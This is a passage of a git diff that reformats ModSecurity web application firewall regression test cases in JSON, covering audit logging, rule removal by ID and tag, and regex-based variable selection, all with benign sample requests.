"Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecDefaultAction \"phase:1,deny,status:403\"", "SecRule ARGS \"@rx a\" \"id:1,phase:1,block" diff --git a/test/test-cases/regression/issue-2000.json b/test/test-cases/regression/issue-2000.json index 05610b457d..43a89a4dc8 100644 --- a/test/test-cases/regression/issue-2000.json +++ b/test/test-cases/regression/issue-2000.json @@ -1,35 +1,41 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing audit log part H should output when deny - issue-2000", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing audit log part H should output when deny - issue-2000", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"index.php?foo=bar&a=xxx", - "method":"GET", - "body": "" - }, - "expected": { - "http_code": 403, - "audit_log": "id \"1234" + "uri": "index.php?foo=bar&a=xxx", + "method": "GET", + "body": [ + "" + ] }, + "response": { + "headers": { - "server":{ - "ip":"127.0.0.1", - "port":80 + }, + "body": [ + "" + ] + }, + "expected": { + "audit_log": "id \"1234", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAuditLogParts ABIJDEFHZ", "SecAuditEngine RelevantOnly", diff --git a/test/test-cases/regression/issue-2099.json b/test/test-cases/regression/issue-2099.json index fff4aa4cc8..7df0c1da9c 100644 --- a/test/test-cases/regression/issue-2099.json +++ b/test/test-cases/regression/issue-2099.json @@ -1,195 +1,254 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/remote.php/webdav?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", - "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" + "uri": "/remote.php/webdav?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", + "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById against - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/remote.php?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/remote.php?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", - "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", + "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/remote.php/webdav?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", - "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/remote.php/webdav?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", + "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag against - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/remote.php?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", - "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/remote.php?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", + "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveTargetByTag - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"1.2.3.4", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveTargetByTag - issue 2099", + "client": { + "ip": "1.2.3.4", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/test.php?a=a", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/test.php?a=a", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", - "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", + "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveTargetByTag against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"1.2.3.4", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveTargetByTag against - issue 2099", + "client": { + "ip": "1.2.3.4", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/index.php?a=a", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", - "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/index.php?a=a", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", + "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] - } + } ] - diff --git a/test/test-cases/regression/issue-2111.json b/test/test-cases/regression/issue-2111.json index c3faa7d216..5383cdd06a 100644 --- a/test/test-cases/regression/issue-2111.json +++ b/test/test-cases/regression/issue-2111.json @@ -1,33 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById with range - issue 1444", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById with range - issue 1444", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"index.php?foo=bar&z=xxx", - "method":"GET", - "body": "" + "uri": "index.php?foo=bar&z=xxx", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"127.0.0.1", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:foo \"@rx ^bar$\" \"id:100,phase:1,ctl:ruleRemoveById=200-1999\"", - "SecRule ARGS:z \"@rx ^xxx$\" \"id:1010,phase:1,deny,status:403\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:foo \"@rx ^bar$\" \"id:100,phase:1,ctl:ruleRemoveById=200-1999\"", + "SecRule ARGS:z \"@rx ^xxx$\" \"id:1010,phase:1,deny,status:403\"" ] } ] diff --git a/test/test-cases/regression/issue-2196.json b/test/test-cases/regression/issue-2196.json index 44347bd08d..d04750367d 100644 --- a/test/test-cases/regression/issue-2196.json +++ b/test/test-cases/regression/issue-2196.json @@ -1,35 +1,41 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing audit log not written when nolog - issue-2196", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing audit log not written when nolog - issue-2196", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"index.php?foo=bar&a=xxx", - "method":"GET", - "body": "" - }, - "expected": { - "http_code": 200, - "audit_log": "\\A[\\s\\S]{0}\\z" + "uri": "index.php?foo=bar&a=xxx", + "method": "GET", + "body": [ + "" + ] }, + "response": { + "headers": { - "server":{ - "ip":"127.0.0.1", - "port":80 + }, + "body": [ + "" + ] + }, + "expected": { + "audit_log": "\\A[\\s\\S]{0}\\z", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAuditLogParts ABIJDEFHZ", "SecAuditEngine RelevantOnly", diff --git a/test/test-cases/regression/issue-2296.json b/test/test-cases/regression/issue-2296.json index bc64d19bd2..95463dbbec 100644 --- a/test/test-cases/regression/issue-2296.json +++ b/test/test-cases/regression/issue-2296.json @@ -1,433 +1,452 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression (1/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression (1/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"Operator `Rx' with parameter `test' against variable `ARGS:THIS'" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "Operator `Rx' with parameter `test' against variable `ARGS:THIS'", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression (2/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression (2/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200, - "debug_log":"Rule returned 0", - "error_log":"" + "expected": { + "debug_log": "Rule returned 0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIz$/ \"test\" \"id:1,deny,status:302\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIz$/ \"test\" \"id:1,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - msg (3/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - msg (3/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"msg \"Testing is a simple test\"" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "msg \"Testing is a simple test\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}'\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - matched_vars (4/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - matched_vars (4/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"msg \"Testing is a simple test\"" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "msg \"Testing is a simple test\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - rule (5/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - rule (5/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":403, - "debug_log":"Target value: .1. .Variable: RULE:id.", - "error_log":"Operator `Rx' with parameter `1' against variable `RULE:id' .Value: `1' ." + "expected": { + "debug_log": "Target value: .1. .Variable: RULE:id.", + "error_log": "Operator `Rx' with parameter `1' against variable `RULE:id' .Value: `1' .", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRule RULE:/^Id$/ \"1\" \"id:1,msg:'Testing %{RULE.id}% -- ',deny\"" + "rules": [ + "SecRuleEngine On", + "SecRule RULE:/^Id$/ \"1\" \"id:1,msg:'Testing %{RULE.id}% -- ',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - TX (6/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - TX (6/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":437, - "error_log":"`Within' with parameter `/name1/' against variable `TX:header_name_name1'" + "expected": { + "error_log": "`Within' with parameter `/name1/' against variable `TX:header_name_name1'", + "http_code": 437 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", - "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,chain,capture\"", - "SecRule TX:/^header_name_/ \"@within %{TX:/esTrictEd_headers/}\" \"setvar:'tx.matched=1'\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", + "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,chain,capture\"", + "SecRule TX:/^header_name_/ \"@within %{TX:/esTrictEd_headers/}\" \"setvar:'tx.matched=1'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - TX (7/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - TX (7/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":437, - "error_log":"`Within' with parameter `/name1/' against variable `TX:header_name_name1'" + "expected": { + "error_log": "`Within' with parameter `/name1/' against variable `TX:header_name_name1'", + "http_code": 437 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", - "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,capture,chain\"", - "SecRule TX:/^HEADER_NAME_/ \"@within %{tx.restricted_headers}\" \"setvar:'tx.matched=1',log\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", + "SecRule REQUEST_HEADERS_NAMES \"^.*$\" 